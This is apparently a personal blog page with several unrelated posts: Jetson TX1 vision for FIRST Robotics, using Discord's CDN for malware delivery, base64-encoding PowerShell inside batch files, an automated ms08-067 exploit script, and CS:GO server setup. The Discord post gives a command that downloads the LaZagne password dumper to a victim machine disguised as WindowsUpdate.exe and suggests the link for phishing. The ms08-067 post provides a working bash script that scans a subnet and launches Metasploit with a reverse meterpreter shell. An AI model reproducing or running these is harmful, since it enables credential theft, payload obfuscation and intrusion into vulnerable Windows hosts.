Vision in FIRST Robotics with the TX1/TX2 | Identifying Yellow Cubes with Python

In past FIRST Robotics competitions, retro reflective tapes with bright LEDs provided an easy and clear target for vision systems. Most of the work was needed in interpreting those values in the  robot code itself. This years game is focus on possession of power cubes. Our team saw the value of identifying those power cubes with vision. We purchased a TX1 and wanted to use GRIP as we had in years past. GRIP doesn’t run natively on ARM processors or the architecture of the TX1, aarch64. Fortunately, in recent versions, GRIP has released an export code function, designed to generate a pipeline for Java, C++, or Python.

You can view our project here.

Getting Started and Setting Up the TX1/TX2

The Jetson needs to be updated from an Ubuntu 14.04 machine at the time of writing (16.04 coming soon). I installed Ubuntu 14 in a VMWare Workstation virtual machine. From there you plug into the TX1 through the micro-USB port and put it into recovery mode. I pretty much followed this well made guide. Just make sure to select File System and OS, Drivers, Flash OS Image to Target, CUDA toolkit, and OpenCV for Tegra during install. You may also want VisionWorks depending on how you plan to implement vision but we did not explore that this year. If you do not install OpenCV for CUDA, your code will not utilize the GPU.

Edit: The OpenCV pipeline we used this year still did not use the GPU. None of the functions we used are supported. Compiled code will always work better with the GPU, please comment if you make a cpp or Java version of this or something similar.

Implementing the GRIP Pipeline

First make a GRIP pipeline from your computer. The input source doesn’t matter, you can plug the webcam into your computer.

Then export your GRIP pipeline in Python. NetworkTables and input source aren’t included in this pipeline.

Now you have your GRIP pipeline. Within this file is a class which we will reference from our runner, in my case rungrip.py

class GripPipeline:

From here we have to choose a camera input source. You may want to use a USB camera for the lowest latency. We streamed our camera to an HTTP port, so I could edit the GRIP project on my laptop using the stream. We used mjpg-streamer. This also includes controls for exposure and brightness to ensure color consistency. You may have build issues on the TX1, we fixed this by editing a certain set of files. You might be able to find the fix on StackExchange here. Newer versions of Nvidia JetPack use OpenCV 3 and this may not be an issue.

You might get errors when compiling as seen above. The OpenCV libraries installed by Nvidia are out of date and require the following changes in the file:

mjpg-streamer/mjpg-streamer-experimental/plugins/input_opencv/input_opencv.cpp

Add cv:: before each instance of CAP_*.

If you use a USB camera plugged into the TX1:

image = cv2.VideoCapture(0)

If you use an HTTP port:

while streamRunning:
  bytes += stream.read(1024)
  a = bytes.find(\xff\xd8)
  b = bytes.find(\xff\xd9)
  if a != 1 and b != 1:
  jpg = bytes[a:b+2]
  bytes = bytes[b+2:]
   
  color = cv2.CV_LOAD_IMAGE_COLOR if version == 2 else cv2.IMREAD_COLOR #name better
  frame = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), color)

 

From here, run the frame through the GRIP pipeline, do some math depending on what you need to find, and publish the values to the network. If you need help look at my project or what RickyAvina did in 2017. Feel free to leave a comment down below!

View our two cube auto at SF here!

Edit: We won the Innovation in Control Award for our work on vision at the Sacramento Regional!

Using Discord’s CDN for Malware Delivery

According to Google a CDN is:

A content delivery network (CDN) is a system of distributed servers (network) that deliver webpages and other Web content to a user based on the geographic locations of the user, the origin of the webpage and a content delivery server.

Discord uses https://cdn.discordapp.com/ to display their content.
For example, when I send an image in a Discord server it is assigned a unique URL.
So I placed this image in an empty Discord server named testing.

But anyone can view it here.

What This Means

Discord’s CDN can be used to deliver malware to a target. In this case, I’m using Discord’s CDN servers to deliver LaZagne to an infected target. You can read about LaZagne here. In short, it dumps passwords from various apps and locations on Windows.

On the infected target, use PowerShell to download the file.

PS C:\Users\Ryan> Invoke-WebRequest -Uri https://cdn.discordapp.com/attachments/297956570850131968/297967232439418880/laZagne.exe -OutFile WindowsUpdate.exe

This has other implications as well. This link could be used in an email attachment for a basic phishing attack.

Running PowerShell Commands in a Batch File

Open PowerShell and define the variable $code by putting your code in between the curly brackets.

$code = {
$IEComObject = New-Object -com “InternetExplorer.Application”; $IEComObject.visible = $True; $IEComObject.navigate(“https://www.youtube.com/watch?v=Wch3gJG2GJ4”)
}

Then encode into base64 using this command

[convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($code))

Then place the base64 sting in your batch file

powershell.exe -EncodedCommand CgAkAEkARQBDAG8AbQBPAGIAagBlAGMAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgACIASQBuAHQAZQByAG4AZQB0AEUAeABwAGwAbwByAGUAcgAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAiADsAIAAkAEkARQBDAG8AbQBPAGIAagBlAGMAdAAuAHYAaQBzAGkAYgBsAGUAIAA9ACAAJABUAHIAdQBlADsAIAAkAEkARQBDAG8AbQBPAGIAagBlAGMAdAAuAG4AYQB2AGkAZwBhAHQAZQAoACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AeQBvAHUAdAB1AGIAZQAuAGMAbwBtAC8AdwBhAHQAYwBoAD8AdgA9AFcAYwBoADMAZwBKAEcAMgBHAEoANAAiACkACgA=

ms08-067 Remote Code Execution Automation

Microsoft Security Bulletin on the vulnerability.

Script for automation of discovery and exploitation of Windows XP ms08-067 remote code execution vulnerability.

Setup
chmod +x ms08-67auto.sh
./ms08-67auto.sh

What It Does
Enter an ip and a subnet for nmap to scan
nmap scans the OS’s and ports 139 and 445
grep filters results to only Windows XP or Server 2003
Prints results and confirm you want to attack
Gathers RHOST RPORT LHOST and LPORT values for a metasploit rc file
Opens created rc file in metasploit
Run exploit -j to begin

#!/bin/bash
read -p $’\e[1;32mEnter the ip and subnet ex. 10.0.0.0/24:\e[0m ‘ ipsubnet
echo -e “\e[1;31mScanning for ports 445 and 139\e[m”
scan=$(sudo nmap $ipsubnet -O -p 445,139)
ports=$(echo “$scan” | grep -E -B 3 -A 7 ‘445/tcp open|139/tcp open’ | grep -E -B 8 ‘Microsoft Windows XP|Microsoft Windows Server 2003’)
echo “$ports”
#echo $scan
read -p ‘Is there a target to attack? Press y:’ attack
if [ “$attack” = “y” ]; then
read -p $’\e[1;31mTarget IP address:\e[m’ rhost
read -p $’\e[1;31mWhich port is the service running on?:\e[m’ rport
read -p $’\e[1;31mWhich ip would you like to connect back too?:\e[m’ lhost
read -p $’\e[1;31mWhich port would you like to connect back on?:\e[m’ lport
sudo service postgresql start
echo -e “use exploit/windows/smb/ms08_067_netapi\nset RHOST $rhost\nset RPORT $rport\nset PAYLOAD windows/meterpreter/reverse_https\nset LHOST $lhost\nset LPORT $lport\nset ExitOnSession false” > windowsxp.rc
msfconsole -q -r windowsxp.rc

else
exit
fi
# 445 and 139

https://github.com/n00shE/ms08-067automation

Creating a CS:GO Server on a VPS

I started with a $5 DigitalOcean droplet with only:

1 CPU

512 MB RAM

20 GB SSD

Running Ubuntu 16.04.1

You may want to upgrade 30 GB because big updates can fill up your space

According to the Valve Developer Community, start with creating a new user. Running Steam as a super user is not recommend.

As the root user, create the steam user:

useradd -m steam

I would also add Steam to the sudo group

usermod -aG sudo steam

Log into the Steam account

su - steam

Start by installing the dependencies for SteamCMD

sudo apt-get install lib32gcc1

Create the directory to install SteamCMD

mkdir ~/Steam && cd ~/Steam

Download SteamCMD

curl -sqL "https://steamcdn-a.akamaihd.net/client/installer/steamcmd_linux.tar.gz" | tar zxvf

Launching and logging in

cd ~/Steam
./steamcmd.sh
login anonymous

Choose a directory (./ creates folder in current directory)

force_install_dir ./cs_go/

Install CS:GO

app_update 740 validate

Install Sourcemod and Metamod next
CPU usage around 80% with 9 players on retakes